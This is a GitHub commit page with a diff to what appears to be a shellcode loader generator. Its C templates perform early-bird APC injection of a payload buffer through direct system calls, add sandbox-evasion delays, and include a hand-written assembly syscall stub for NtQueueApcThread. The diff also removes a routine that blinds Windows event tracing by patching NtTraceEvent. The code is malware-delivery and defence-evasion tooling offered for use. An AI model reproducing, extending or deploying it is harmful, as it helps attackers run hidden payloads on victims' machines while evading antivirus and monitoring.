完善syscall下earlybird加载方式

fdx-xdf · Apr 9, 2024 · 6f30183 · 6f30183
1 parent b9363e1
commit 6f30183
Show file tree

Hide file tree

Showing 3 changed files with 63 additions and 39 deletions.
diff --git a/Loader/Template.go b/Loader/Template.go
@@ -10,9 +10,9 @@ var __c__sandbox = `
 	isPrime(1000000000000002217);
 	isPrime(1000000000000002137);
 	isPrime(1000000000000002097);
-	//isPrime(1000000000000002049);
-	//isPrime(1000000000000001953);
-	//isPrime(1000000000000002481);
+	isPrime(1000000000000002049);
+	isPrime(1000000000000001953);
+	isPrime(1000000000000002481);
 
 `
 
@@ -28,21 +28,20 @@ var __c__syscall_callback = `
 	EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
 `
 var __c__syscall__earlyBird = `
-    LPVOID shellAddress = VirtualAlloc(NULL, allocationSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    DWORD oldProtect;
     myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
-    memcpy(shellAddress, xpp, allocationSize);
-    //WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, allocationSize, NULL);
-
-
-    QueueUserAPC((PAPCFUNC)shellAddress, GetCurrentThread(), NULL);
-    testAlert();
-    //VAV_NtAllocateVirtualMemory(hProcess, &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    //VAV_NtWriteVirtualMemory(hProcess, addr, xpp, length, &bytesWritten);
-    ////LPVOID addr1 = VirtualAlloc(NULL, sizeof(xpp), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-    ////RtlMoveMemory(addr1, xpp,length);
-    ////QueueUserAPC((PAPCFUNC)addr1, GetCurrentThread(), NULL);
-	//Sw3NtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
-    //Sw3NtTestAlert();
+ 	VAV_NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x04);
+	isPrime(1000000000000002049);
+    VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x20, &oldProtect);	
+	isPrime(1000000000000002049);
+    VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect);	
+	isPrime(1000000000000002049);
+	VAV_NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
+	//VAVNtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
+    QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
+	//VAVNtTestAlert();
+    testAlert();	
+	
 `
 
 // 纤程加载
@@ -349,21 +348,10 @@ _Bool isPrime(long long n) {
     return 1;
 }
 
-DWORD PatchEtw()
-{
-DWORD dwOld = 0;
-FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent");
-VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld);
-memcpy(ptrNtTraceEvent, "\xc3", 1);
-VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld);
-return 0;
-}
 
 int main()
 {
-
-	PatchEtw();
-    pNewLdrLoadDll LdrLoadrDll;
+ 	pNewLdrLoadDll LdrLoadrDll;
     UNICODE_STRING user32dll;
     UNICODE_STRING kernel32dll;
     UNICODE_STRING ntdlldll;
@@ -739,19 +727,9 @@ void My_Xor(char* data, size_t data_len, char* key, size_t key_len) {
         j++;
     }
 }
-DWORD PatchEtw()
-{
-DWORD dwOld = 0;
-FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent");
-VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld);
-memcpy(ptrNtTraceEvent, "\xc3", 1);
-VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld);
-return 0;
-}
 
 int main()
 {
-	PatchEtw();
     pNewLdrLoadDll LdrLoadrDll;
     UNICODE_STRING user32dll;
     UNICODE_STRING kernel32dll;

diff --git a/sys_32.c b/sys_32.c
@@ -429,6 +429,45 @@ __declspec(naked) NTSTATUS VAV_NtProtectVirtualMemory(
 	);
 }
 
+__declspec(naked) NTSTATUS VAVNtQueueApcThread(
+	IN HANDLE ThreadHandle,
+	IN PKNORMAL_ROUTINE ApcRoutine,
+	IN PVOID ApcArgument1 OPTIONAL,
+	IN PVOID ApcArgument2 OPTIONAL,
+	IN PVOID ApcArgument3 OPTIONAL)
+{
+	asm(
+		"push ebp \n"
+		"mov ebp, esp \n"
+		"push 0x14BC1E11 \n"
+		"call _VAV_GetSyscallAddress \n"
+		"mov edi, eax \n"
+		"push 0x14BC1E11 \n"
+		"call _VAV_GetSyscallNumber \n"
+		"lea esp, [esp+4] \n"
+		"mov ecx, 0x5 \n"
+	"push_argument_14BC1E11: \n"
+		"dec ecx \n"
+		"push [ebp + 8 + ecx * 4] \n"
+		"jnz push_argument_14BC1E11 \n"
+		"mov ecx, eax \n"
+		"mov eax, ecx \n"
+		"lea ebx, [ret_address_epilog_14BC1E11] \n"
+		"push ebx \n"
+		"call do_sysenter_interrupt_14BC1E11 \n"
+		"lea esp, [esp+4] \n"
+	"ret_address_epilog_14BC1E11: \n"
+		"mov esp, ebp \n"
+		"pop ebp \n"
+		"ret \n"
+	"do_sysenter_interrupt_14BC1E11: \n"
+		"mov edx, esp \n"
+		"jmp edi \n"
+		"ret \n"
+	);
+}
+
+
 
 
 #endif
diff --git a/sys_32.h b/sys_32.h
@@ -309,6 +309,13 @@ EXTERN_C NTSTATUS VAV_NtProtectVirtualMemory(
 	IN ULONG NewProtect,
 	OUT PULONG OldProtect);
 
+EXTERN_C NTSTATUS VAVNtQueueApcThread(
+	IN HANDLE ThreadHandle,
+	IN PKNORMAL_ROUTINE ApcRoutine,
+	IN PVOID ApcArgument1 OPTIONAL,
+	IN PVOID ApcArgument2 OPTIONAL,
+	IN PVOID ApcArgument3 OPTIONAL);
+